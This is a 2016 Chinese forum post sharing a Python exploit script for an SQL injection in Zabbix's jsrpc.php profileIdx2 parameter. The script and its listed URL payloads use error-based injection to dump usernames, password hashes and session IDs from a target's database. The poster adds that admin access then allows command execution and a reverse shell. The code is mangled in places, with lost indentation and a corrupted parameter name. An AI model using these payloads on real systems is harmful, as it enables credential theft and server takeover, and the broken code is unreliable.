zabbix注入利用脚本
本帖最后由 wuyan 于 2016-8-18 19:27 编辑没什么好讲的,分析的文章页不想写了,就是insert注入。
#/usr/bin/python
#*-*coding=utf-8*-*
import requests
import re
import sys
'''
===getpass payloads===
1./jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit 1,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=showlatest&filter=&filter_task=&mark_color=1
2./jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
===session 获取===
1./jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,sessionid,0x7e))+from+sessions+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
'''
def getpass(url,num):
payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&\
hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
(rand(0)*2), (select concat(0x7e,0x7e,alias,0x3a,passwd,0x7e,0x7e) from users limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
tempurl = url + payloads
response = req = requests.get(tempurl).content
return response
def filter(content):
try:
result = re.findall(r"~~(.*?)~~",content)
print result
return True
except Exception, e:
return False
def getsession(url,num):
payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&\
hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
(rand(0)*2), (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
tempurl = url + payloads
response = req = requests.get(tempurl).content
return response
def usage():
print " usage1: python zabbix.py xxx.com passwd"
print " usage2: python zabbix.py xxx.com session\n"
if __name__ == '__main__':
logo = '''\n
_____ _ _ _ _____ _
|__/__ _| |__ | |__ (_)__|___| ____| | __
/ // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
/ /| (_| | |_) | |_) | |><|_|| |_| | (__| <
/____\__,_|_.__/|_.__/|_/_/\_\_| \__,_|\___|_|\_\
\n**************coded by bsmali4 2016-8-16*****************
'''
print logo
if len(sys.argv) != 3:
usage()
else:
host = sys.argv.strip('/')
method = sys.argv
if method == 'passwd':
for i in range (0,999):
response = getpass(host,i)
if not filter(response):
break
elif method == 'session':
for i in range(0,999):
response = getsession(host,i)
if not filter(response):
break
登陆后台后可以直接执行命令,反弹shell什么的是极好的
这样真的好么,信不信我也直接丢个汇编代码然后说没啥好写的;P 卧槽,居然没人来捧场。
页:
[1]